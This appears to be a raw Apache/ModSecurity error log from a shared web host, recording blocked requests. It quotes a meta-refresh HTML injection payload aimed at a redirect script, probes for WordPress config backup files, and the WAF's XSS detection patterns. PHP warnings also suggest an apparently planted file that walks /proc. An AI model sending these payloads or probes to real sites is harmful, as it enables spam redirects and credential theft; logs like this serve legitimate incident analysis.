[Tue May 12 02:17:08.316478 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:08.316831 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:27.423622 2026] [security2:error] [pid 1730207:tid 1730224] [client 43.156.43.123:55320] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/louer-mobil-home/"] [unique_id "agJxlzue9Sp-pIv_Bb6JbQAAAU8"]
[Tue May 12 02:17:27.837617 2026] [security2:error] [pid 1709071:tid 1709089] [client 43.138.68.113:52868] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agJxl7vMumyrWMfSu7qiZwAAAMI"]
[Tue May 12 02:17:27.839765 2026] [autoindex:error] [pid 1709071:tid 1709089] [client 43.138.68.113:52868] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/31/task/31/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/31/task/31/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/31/task/31/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/31/task/31/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:17:48.656376 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.656793 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.656959 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.657054 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.657232 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.657667 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
[Tue May 12 02:17:48.657923 2026] [security2:error] [pid 1709071:tid 1709090] [client 27.78.84.116:61893] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxrLvMumyrWMfSu7qidgAAAMM"]
PHP Warning:  filesize(): stat failed for /proc/10/task/10/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/10/task/10/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/10/task/10/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/10/task/10/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/10/task/10/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/10/task/10/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:18:09.284213 2026] [security2:error] [pid 1707624:tid 1707692] [client 43.166.226.57:56238] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/comments/feed/"] [unique_id "agJxwbOxS7i6i_mT2NLCfwAAAEo"]
[Tue May 12 02:18:09.433121 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.433873 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.434328 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.434909 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.435595 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.436108 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:09.436641 2026] [security2:error] [pid 1691274:tid 1691295] [client 27.78.84.116:62911] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxwVfdQaraX_prmqcYOgAAABM"]
[Tue May 12 02:18:10.626518 2026] [security2:error] [pid 1709071:tid 1709103] [client 43.166.242.189:57920] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "bender.piregwan-genesis.com"] [uri "/"] [unique_id "agJxwrvMumyrWMfSu7qifAAAANA"], referer: http://bender.piregwan-genesis.com
[Tue May 12 02:18:17.813333 2026] [security2:error] [pid 1730175:tid 1730189] [client 130.12.182.66:57414] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.bak"] [unique_id "agJxyXo6NvB9WXx5V-5z8AAAAQw"]
[Tue May 12 02:18:17.813564 2026] [security2:error] [pid 1730175:tid 1730189] [client 130.12.182.66:57414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.bak"] [unique_id "agJxyXo6NvB9WXx5V-5z8AAAAQw"]
[Tue May 12 02:18:17.814496 2026] [security2:error] [pid 1730207:tid 1730212] [client 130.12.182.66:57428] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "rentparadise.fr"] [uri "/wp-config.backup"] [unique_id "agJxyTue9Sp-pIv_Bb6JjgAAAUM"]
[Tue May 12 02:18:17.814842 2026] [security2:error] [pid 1730207:tid 1730212] [client 130.12.182.66:57428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.backup"] [unique_id "agJxyTue9Sp-pIv_Bb6JjgAAAUM"]
[Tue May 12 02:18:17.816721 2026] [security2:error] [pid 1691274:tid 1691278] [client 130.12.182.66:57422] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.old"] [unique_id "agJxyVfdQaraX_prmqcYRgAAAAE"]
[Tue May 12 02:18:17.816872 2026] [security2:error] [pid 1691274:tid 1691278] [client 130.12.182.66:57422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.old"] [unique_id "agJxyVfdQaraX_prmqcYRgAAAAE"]
